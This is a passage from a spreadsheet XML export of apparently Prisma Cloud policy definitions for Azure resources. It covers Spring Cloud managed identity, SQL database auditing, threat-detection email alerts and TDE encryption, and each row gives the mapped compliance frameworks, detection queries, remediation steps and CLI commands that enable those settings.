          <t>azure-spring-cloud-service</t>
        </is>
      </c>
      <c r="W2417" t="inlineStr">
        <is>
          <t>This policy identifies Azure Spring Cloud apps in which system-assigned managed identity is disabled. System-assigned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system-assigned managed identity to your Spring Cloud apps.</t>
        </is>
      </c>
      <c r="X2417" t="inlineStr">
        <is>
          <t>To enable system-assigned managed identity on an existing Azure Spring Cloud app, follow the below URL:
https://docs.microsoft.com/en-in/azure/spring-cloud/how-to-enable-system-assigned-managed-identity</t>
        </is>
      </c>
      <c r="Y2417" t="inlineStr"/>
      <c r="Z2417" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-spring-cloud-service' AND json.rule = properties.powerState equals Running as X; config from cloud.resource where api.name = 'azure-spring-cloud-app' AND json.rule = properties.provisioningState equals Succeeded and identity does not exist as Y; filter '$.X.name equals $.Y.serviceName'; show Y;</t>
        </is>
      </c>
      <c r="AA2417" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2417" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2417" t="inlineStr">
        <is>
          <t>PC-AZR-ASC-844</t>
        </is>
      </c>
      <c r="AD2417" t="b">
        <v>1</v>
      </c>
      <c r="AE2417" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2417" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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7" t="inlineStr">
        <is>
          <t>0434af54-58d5-4932-9810-c72b4d37e788</t>
        </is>
      </c>
      <c r="AI2417" t="inlineStr">
        <is>
          <t>c0bbd8c0-f785-4774-b8f6-2a910422aa42</t>
        </is>
      </c>
      <c r="AJ2417" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2417" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2418">
      <c r="A2418" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST CSF v2.0, jbrox - GDPR, NIST CSF, MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 2, NIST CSF, CSA CCM v3.0.1, APRA (CPS 234) Information Security, SOC 2, GDPR, NIST CSF, PCI DSS v3.2.1, CDC NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, SOC 2, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v3.0.1, SOC 2, NIST CSF, NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST CSF, Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev 5, CDC NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], Copy of SOC 2, NIST 800-53 Rev4, NIST CSF v2.0, SOC 2, Copy of SOC 2, CSA CCM v3.0.1, ISO 27001:2013, Copy of SOC 2, CSA CCM v3.0.1, ISO 27001:2013, Copy of SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], CDC NIST 800-53 Rev4, NIST CSF, CDC NIST 800-53 Rev4, NIST CSF, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, NIST 800-53 Rev 5, CRI Profile v2.0, NIST CSF, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, NIST 800-53 Rev4, NIST CSF, SOC 2, jbrox - GDPR, jbrox - GDPR, HIPAA, NIST 800-53 Rev4, NIST 800-53 Rev4, SOC 2, NIST CSF, APRA (CPS 234) Information Security, CSA CCM v3.0.1, SOC 2, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, NIST SP 800-171 Revision 2, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, GDPR, NIST CSF, NIST CSF, SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v3.0.1, CSA CCM v4.0.12, CDC NIST 800-53 Rev4, CSA CCM v3.0.1, DORA, NIST 800-53 Rev 5, NIST CSF, Brazilian Data Protection Law (LGPD), NIST CSF, NIST 800-53 Rev 5, Fedramp (Moderate), NIST SP 800-172, SOC 2, Brazilian Data Protection Law (LGPD), CSA CCM v3.0.1, CDC NIST 800-53 Rev4, NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev 5, NIST 800-53 Rev4, Fedramp (Moderate)</t>
        </is>
      </c>
      <c r="B2418" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2418" s="2" t="inlineStr"/>
      <c r="D2418" t="inlineStr"/>
      <c r="E2418" t="inlineStr"/>
      <c r="F2418" t="inlineStr"/>
      <c r="G2418" t="b">
        <v>1</v>
      </c>
      <c r="H24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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2418" t="inlineStr">
        <is>
          <t>azure-sql-db</t>
        </is>
      </c>
      <c r="K2418" t="inlineStr">
        <is>
          <t>Azure SQL Databases with disabled Email service and co-administrators for Threat Detection</t>
        </is>
      </c>
      <c r="L2418" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2418" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2418" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2418" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2418" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2418" t="inlineStr">
        <is>
          <t>SI-1</t>
        </is>
      </c>
      <c r="R2418" t="inlineStr">
        <is>
          <t>SI-7 (2)</t>
        </is>
      </c>
      <c r="S2418" t="inlineStr"/>
      <c r="T2418" t="b">
        <v>1</v>
      </c>
      <c r="U2418" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2418" t="inlineStr">
        <is>
          <t>azure-sql-db-list</t>
        </is>
      </c>
      <c r="W2418" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Databases which have ADS Vulnerability Assessment 'Also send email notifications to admins and subscription owners' not configured. This setting enables ADS - VA scan reports being sent to admins and subscription owners. It is recommended to enable 'Also send email notifications to admins and subscription owners' setting, which would help in reducing time required for identifying risks and taking corrective measures.</t>
        </is>
      </c>
      <c r="X2418" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Go to SQL databases (Left Panel)
3. Choose the reported each DB instance
4. Click on 'Microsoft Defender for Cloud' under 'Security'
5. Click on '(Configure)' next to 'Microsoft Defender for SQL: Enabled at the server-level'
6. In 'VULNERABILITY ASSESSMENT SETTINGS' section, Ensure 'Also send email notifications to admins and subscription owners' is checked
7. 'Save' your changes 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azr-general-8</t>
        </is>
      </c>
      <c r="Y2418" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Sql/servers/databases/securityAlertPolicies/*' permission. Successful execution will enable SQL database Threat detection 'Email service and co-administrators'.",
'impact': 'enable SQL database Threat detection email service and co-administrators',
'cliScriptTemplate': 'az sql db threat-policy update --ids $resourceId --email-account-admins Enabled'</t>
        </is>
      </c>
      <c r="Z2418" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-db-list' AND json.rule = 'securityAlertPolicy does not exist or securityAlertPolicy[*] is empty or (securityAlertPolicy.properties.state equals Enabled and securityAlertPolicy.properties.emailAccountAdmins equals Disabled)'
{"category":"General","resourceTypes":["azurerm_mssql_server_security_alert_policy"]}</t>
        </is>
      </c>
      <c r="AA2418" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2418" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2418" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-136-CKV_AZURE_27</t>
        </is>
      </c>
      <c r="AD2418" t="b">
        <v>1</v>
      </c>
      <c r="AE2418" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2418" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>561cd005-12dd-4bb4-b0c7-d6de31e76c69</t>
        </is>
      </c>
      <c r="AI2418" t="inlineStr">
        <is>
          <t>c2ce11a6-a1c2-48f9-9b24-f1384d6ced01</t>
        </is>
      </c>
      <c r="AJ2418" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2418" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2419">
      <c r="A2419" t="inlineStr">
        <is>
          <t>ISO 27001:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev 5, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, jbrox - GDPR, kashan ACSC Information Security Manual (ISM), TX-RAMP Level 2, MLPS 2.0 (Level 2), ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, kfirdaus AWS Account-CS, ITSG-33, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CDC NIST 800-53 Rev4, NIST 800-53 Rev4, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, CSA CCM v3.0.1, New Zealand Information Security Manual (NZISM v3.4), SOC 2, CIS Controls v8, GDPR, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v9.3 [Deprecated], ISO 27001:2013, kashan ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, SOC 2, NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, NIST 800-53 Rev 5, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, ACSC Information Security Manual (ISM), Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, Brazilian Data Protection Law (LGPD), PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, NIST 800-53 Rev4, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, kfirdaus AWS Account-CS, CRI Profile v1.2.1, CDC NIST 800-53 Rev4, ISO 27002:2022, APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, PCI DSS v4.0, SOC 2, HIPAA, PIPEDA, HITRUST CSF v9.3 [Deprecated], NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, Secure Controls Framework (SCF) - 2022.2.1, Fedramp (Moderate), PCI DSS v4.0, NIST 800-53 Rev4, PCI DSS v4.0, PCI DSS v3.2.1, CRI Profile v1.2.1, HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.6, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, CSA CCM v3.0.1, DORA, ACSC Information Security Manual (ISM), PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, HITRUST CSF v9.3 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, HITRUST CSF v9.3 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2419" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2419" s="2" t="inlineStr"/>
      <c r="D2419" t="inlineStr"/>
      <c r="E2419" t="inlineStr"/>
      <c r="F2419" t="inlineStr"/>
      <c r="G2419" t="b">
        <v>1</v>
      </c>
      <c r="H24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19" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2419" t="inlineStr">
        <is>
          <t>azure-sql-db</t>
        </is>
      </c>
      <c r="K2419" t="inlineStr">
        <is>
          <t>Azure SQL database auditing is disabled</t>
        </is>
      </c>
      <c r="L2419" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2419" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2419" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2419" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2419" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2419" t="inlineStr">
        <is>
          <t>Guidelines for Database Systems</t>
        </is>
      </c>
      <c r="R2419" t="inlineStr">
        <is>
          <t>ISM-1537</t>
        </is>
      </c>
      <c r="S2419" t="inlineStr"/>
      <c r="T2419" t="b">
        <v>0</v>
      </c>
      <c r="U2419" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2419" t="inlineStr">
        <is>
          <t>azure-sql-db-list</t>
        </is>
      </c>
      <c r="W2419" t="inlineStr">
        <is>
          <t>This policy identifies SQL databases in which auditing is set to Off.  Database events are tracked by the Auditing feature and the events are written to an audit log in your Audit log destinations. This process helps you to monitor database activity, and get insight into anomalies that could indicate business concerns or suspected security violations.</t>
        </is>
      </c>
      <c r="X2419" t="inlineStr">
        <is>
          <t>If server auditing is enabled, it always applies to the database. The database will be audited, regardless of the database auditing settings. It is recommended that you enable only server-level auditing and leave the database-level auditing disabled for all databases.
To enable auditing at server level:
1. Log in to the Azure Portal
2. Note down the reported SQL database and SQL server
3. Select 'SQL servers', Click on the SQL server instance you wanted to modify
4. Select 'Auditing' under 'Security' section, and set the status to 'On' and choose any Audit log destinations.
5.  Click on 'Save'
It is recommended to avoid enabling both server auditing and database blob auditing together, unless:
If you want to use a different storage account, retention period or Log Analytics Workspace for a specific database or want to use for audit event types or categories for a specific database that differ from the rest of the databases on the server.
To enable auditing at database level:
1. Log in to the Azure Portal
2. Note down the reported SQL database
3. Select 'SQL databases', Click on the SQL database instance you wanted to modify
4. Select 'Auditing' under 'Security' section, and set the status to 'On' and choose any Audit log destinations.
5.  Click on 'Save'</t>
        </is>
      </c>
      <c r="Y2419" t="inlineStr"/>
      <c r="Z2419" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'azure-sql-db-list' AND json.rule = blobAuditPolicy.properties.state equals Disabled or blobAuditPolicy does not exist or blobAuditPolicy is empty as X; config from cloud.resource where api.name = 'azure-sql-server-list' AND json.rule = serverBlobAuditingPolicy.properties.state equals Disabled or serverBlobAuditingPolicy does not exist or serverBlobAuditingPolicy is empty as Y; filter '$.X.blobAuditPolicy.id contains $.Y.sqlServer.name'; show X;</t>
        </is>
      </c>
      <c r="AA2419" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2419" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2419" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-106</t>
        </is>
      </c>
      <c r="AD2419" t="b">
        <v>1</v>
      </c>
      <c r="AE2419" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2419" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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19" t="inlineStr">
        <is>
          <t>96b1b8e3-6936-434f-94ab-a154cd5967d9</t>
        </is>
      </c>
      <c r="AI2419" t="inlineStr">
        <is>
          <t>8e7342aa-be1e-4db1-8775-c886a16d085a</t>
        </is>
      </c>
      <c r="AJ2419" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2419" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2420">
      <c r="A2420" t="inlineStr">
        <is>
          <t>ISO 27001:2013, HIPAA, Secure Controls Framework (SCF) - 2024.2, GDPR, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, ISO 27002:2022, CSA CCM v.4.0.6, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-172, FFIEC, ISO/IEC 27001:2022, CIS Controls v8, CIS Controls v8.1, CIS Controls v7.1, ISO/IEC 27001:2022, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, Fedramp (Moderate), NIST 800-53 Rev 5, NYDFS 23 CRR-NY 500.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), FFIEC, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Cybersecurity Maturity Model Certification (CMMC) v.1.02, Telecommunications Security Act - TSA, Fedramp (Low), CRI Profile v1.2.1, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], Secure Controls Framework (SCF) - 2022.2.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST CSF v2.0, NIST 800-53 Rev4, PCI DSS v4.0, FFIEC, NIST 800-53 Rev4, CyberSecurity Law of the People's Republic of China, ISO 27001:2013, MLPS 2.0 (Level 2), SOC 2, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Telecommunications Security Act - TSA, CIS v1.5.0 (Azure) - Level 1, CSA CCM v3.0.1, DORA, CIS v1.3.1 (Azure), CIS v1.2.0 (Azure), NIST 800-53 Rev4, PCI DSS v4.0, NIST CSF v2.0, NIST 800-53 Rev 5, CRI Profile v2.0, CyberSecurity Law of the People's Republic of China, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, CIS v2.1.0 (Azure) Level 1, Azure Security Benchmark (v3), PCI DSS v4.0, CIS v1.3.0 (Azure), APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, HITRUST CSF v9.3 [Deprecated], Sarbanes Oxley Act (SOX), CSA CCM v3.0.1, PCI DSS v4.0, APRA (CPS 234) Information Security, NIST CSF, CIS v1.1 (Azure), NIST CSF, ACSC Information Security Manual (ISM), HITRUST CSF v9.3 [Deprecated], PCI DSS v4.0, GDPR, HIPAA, HITRUST CSF v9.3 [Deprecated], PCI DSS v4.0, CIS v2.0.0 (Azure) Level 1, Azure Security Benchmark (v3), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, CCPA 2018, PIPEDA, CRI Profile v2.0, Fedramp (Moderate), Brazilian Data Protection Law (LGPD), CSA CCM v3.0.1, CIS v1.4.0 (Azure), CyberSecurity Law of the People's Republic of China, CRI Profile v1.2.1, Azure Security Benchmark (v2), PCI DSS v4.0, NIST SP 800-171 Revision 2, HITRUST CSF v9.3 [Deprecated], PCI DSS v3.2.1, HITRUST CSF v9.3 [Deprecated]</t>
        </is>
      </c>
      <c r="B2420" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2420" s="2" t="inlineStr"/>
      <c r="D2420" t="inlineStr"/>
      <c r="E2420" t="inlineStr"/>
      <c r="F2420" t="inlineStr"/>
      <c r="G2420" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2420" t="inlineStr">
        <is>
          <t>azure-sql-db</t>
        </is>
      </c>
      <c r="K2420" t="inlineStr">
        <is>
          <t>Azure SQL database Transparent Data Encryption (TDE) encryption disabled</t>
        </is>
      </c>
      <c r="L2420" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2420" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2420" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2420" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2420" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2420" t="inlineStr">
        <is>
          <t>Control Category: 01.0</t>
        </is>
      </c>
      <c r="R2420" t="inlineStr">
        <is>
          <t>Control Reference:01.j</t>
        </is>
      </c>
      <c r="S2420" t="inlineStr">
        <is>
          <t>Azure</t>
        </is>
      </c>
      <c r="T2420" t="b">
        <v>1</v>
      </c>
      <c r="U2420" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2420" t="inlineStr">
        <is>
          <t>azure-sql-db-list</t>
        </is>
      </c>
      <c r="W2420" t="inlineStr">
        <is>
          <t>This policy identifies SQL databases in which Transparent Data Encryption (TDE) is disabled. TDE encryption performs real-time encryption and decryption of the database, related reinforcements, and exchange log records without requiring any changes to the application. It encrypts the storage of an entire database by using a symmetric key called the database encryption key. It is recommended to have TDE encryption on your SQL databases to protect the database from malicious activity.</t>
        </is>
      </c>
      <c r="X2420" t="inlineStr">
        <is>
          <t>1. Login to Azure Portal
2. Click on SQL databases (Left Panel)
3. Choose the reported database
4. Under Security, Click on Transparent data encryption
5. Set Data encryption to ON
6. Click on Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-25
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/bc-azure-2-25</t>
        </is>
      </c>
      <c r="Y2420" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 'Microsoft.Sql/servers/databases/transparentDataEncryption/*' permission. Successful execution will enable SQL database encryption.",
'impact': 'enable SQL database encryption',
'cliScriptTemplate': 'az sql db tde set --ids $resourceId --status Enabled'</t>
        </is>
      </c>
      <c r="Z2420" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-db-list' AND json.rule = transparentDataEncryption is false
{"category":"General","resourceTypes":["azurerm_mssql_database"]}</t>
        </is>
      </c>
      <c r="AA2420" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2420" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2420" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-52-CKV2_AZURE_25</t>
        </is>
      </c>
      <c r="AD2420" t="b">
        <v>1</v>
      </c>
      <c r="AE2420" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2420" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>5a772daf-17c0-4a20-a689-2b3ab3f33779</t>
        </is>
      </c>
      <c r="AI2420" t="inlineStr">
        <is>
          <t>5a772daf-17c0-4a20-a689-2b3ab3f33779</t>
        </is>
      </c>
      <c r="AJ2420" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2420" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2421">
      <c r="A2421" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, NIST CSF, NIST SP 800-172, Microsoft Cloud Security Benchmark v1, CDC NIST 800-53 Rev4, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, ISO/IEC 27017:2015, Copy of CIS Controls v8, ISO/IEC 27002:2013, MLPS 2.0 (Level 2), NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2024.2, Fedramp (Moderate), CIS Controls v8, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST CSF, NIST CSF, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF, CyberSecurity Law of the People's Republic of China, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v3.2.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, NIST CSF, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO 27001:2013, Copy of New Zealand Information Security Manual (NZISM v3.4), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, NIST 800-53 Rev4, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, NIST CSF, NIST CSF, NIST CSF, Copy of ACSC Information Security Manual (ISM)-clone, ISO 27001:2013, New Zealand Information Security Manual (NZISM v3.4), NIST 800-53 Rev4, CIS Controls v8.1, ISO/IEC 27002:2013, CCPA 2018, NIST CSF, PIPEDA, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CIS Controls v7.1, mms-may-15, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), ISO/IEC 27018:2019, Australian Energy Sector Cyber Security Framework (AESCSF), CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, ISO/IEC 27018:2019, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2421" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2421" s="2" t="inlineStr"/>
      <c r="D2421" t="inlineStr"/>
      <c r="E2421" t="inlineStr"/>
      <c r="F2421" t="inlineStr"/>
      <c r="G2421" t="b">
        <v>1</v>
      </c>
      <c r="H24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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2421" t="inlineStr">
        <is>
          <t>azure-sql-db</t>
        </is>
      </c>
      <c r="K2421" t="inlineStr">
        <is>
          <t>Azure SQL databases Defender setting is set to Off</t>
        </is>
      </c>
      <c r="L2421" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2421" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2421" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2421" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2421" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2421" t="inlineStr">
        <is>
          <t>SA-1</t>
        </is>
      </c>
      <c r="R2421" t="inlineStr">
        <is>
          <t>SA-11 (2)</t>
        </is>
      </c>
      <c r="S2421" t="inlineStr"/>
      <c r="T2421" t="b">
        <v>0</v>
      </c>
      <c r="U2421" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2421" t="inlineStr">
        <is>
          <t>azure-sql-db-list</t>
        </is>
      </c>
      <c r="W2421" t="inlineStr">
        <is>
